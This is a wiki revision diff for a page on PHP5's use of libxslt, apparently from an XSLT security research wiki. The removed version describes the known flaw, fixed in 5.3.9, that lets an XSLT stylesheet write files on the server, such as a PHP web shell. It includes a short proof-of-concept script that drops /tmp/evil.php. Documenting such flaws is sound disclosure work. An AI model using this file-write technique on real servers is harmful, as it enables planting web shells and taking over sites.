Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version Icon 6.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:34
Change comment: Upload new attachment create-file-via-libxslt.php
To version 1.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:37
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -1,10 +1,6 @@
1 1  Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/PHP||rel="__blank"]] : "//PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. It is among one of the first developed server-side scripting languages that is embedded into a HTML source document, rather than calling an external file to process data. Ultimately, the code is interpreted by a web server with a PHP processor module which generates the resulting web page.//"
2 2  
3 3  
4 +Version 5 of this language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT.
4 4  
5 -== Creating files ==
6 6  
7 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
8 -
9 -
10 -The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/.
Icon create-file-via-libxslt.php
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -601 bytes
Content
... ... @@ -1,33 +1,0 @@
1 -<?php
2 -
3 -$sXml = '<empty/>';
4 -
5 -$sXsl = <<<EOT
6 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
7 -
8 - <xsl:template match="/">
9 - <xsl:document href="/tmp/evil.php" method="text">
10 - <xsl:text><![CDATA[<?php phpinfo() ?>]]></xsl:text>
11 - </xsl:document>
12 - </xsl:template>
13 -
14 -</xsl:stylesheet>
15 -EOT;
16 -
17 -# LOAD XML FILE
18 -$XML = new DOMDocument();
19 -$XML->loadXML( $sXml );
20 -
21 -# LOAD XSLT FILE
22 -$XSL = new DOMDocument();
23 -$XSL->loadXML( $sXsl );
24 -
25 -# START XSLT
26 -$xslt = new XSLTProcessor();
27 -$xslt->importStylesheet( $XSL );
28 -
29 -# TRASNFORM & PRINT
30 -print $xslt->transformToXML( $XML );
31 -
32 -?>
33 -